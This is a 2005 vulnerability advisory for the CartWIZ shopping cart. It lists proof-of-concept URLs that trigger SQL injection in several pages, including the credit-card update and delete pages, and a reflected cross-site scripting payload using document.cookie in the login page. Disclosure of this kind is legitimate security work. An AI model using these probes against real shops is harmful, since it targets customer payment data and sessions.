|
HSC Research Group -
Advisories
|
|
Written by Hackers Center
|
|
Thursday, 07 July 2005 15:14 |
 Dcrab "s Security Advisory
http://www.dbtech.org
Deadbolt Computer Technologies
******************************
SPECIAL BIRTHDAY RELEASE, 18TH BIRTHDAY RELEASE FOR DIABOLIC CRAB, YOU CAN SEND EMAILS TO
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
******************************
Get Dcrab"s Services to audit your Web servers, scripts, networks, etc or even code them. Learn more at http://www.dbtech.org
Severity: High
Title: Cartwiz shopping cart has multiple Sql injection and Cross Site Scripting vulnerabilities
Date: 8/07/2005
Vendor: CartWIZ
Vendor Website: http://www.cartwiz.com/
Vendor Status: Contacted but no reply
Summary: There are, multiple sql injection and cross site scripting vulnerabilities in CartWIZ Shopping Cart
Proof of Concept Exploits:
www.site.com/cartwiz/store/tellAFriend.asp?idProduct="
SQL INJECTION
Microsoft OLE DB Provider for ODBC Drivers error "80040e14"
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string "".
/cartwiz/store/tellAFriend.asp, line 71
www.site.com/cartwiz/store/viewSupportTickets.asp?sortType="&sortOrder=ticketNum&page=0
SQL INJECTION
Microsoft OLE DB Provider for ODBC Drivers error "80040e14"
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string "".
www.site.com/cartwiz/store/viewSupportTickets.asp, line 149
www.site.com/cartwiz/store/updateCreditCards.asp?id="
SQL INJECTION
Microsoft OLE DB Provider for ODBC Drivers error "80040e14"
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string " and idCustomer=1".
/cartwiz/store/updateCreditCards.asp, line 31
www.site.com/cartwiz/store/deleteCreditCards.asp?id="
SQL INJECTION
Microsoft OLE DB Provider for ODBC Drivers error "80040e14"
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string "".
www.site.com/cartwiz/store/deleteCreditCards.asp, line 27
www.site.com/cartWiz/store/login.asp?message=><script>alert(document.cookie);</script>&redirect=%2FcartWiz%2Fstore%2FmyAccount%2Easp
Cross Site Scripting
Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah and at http://www.hackerscenter.com
Author:
These vulnerabilities have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to contact me regarding these vulnerabilities. You can find me at, http://www.hackerscenter.com or http://www.dbtech.org/. Lookout for my soon to come out book on Secure coding with php.
|
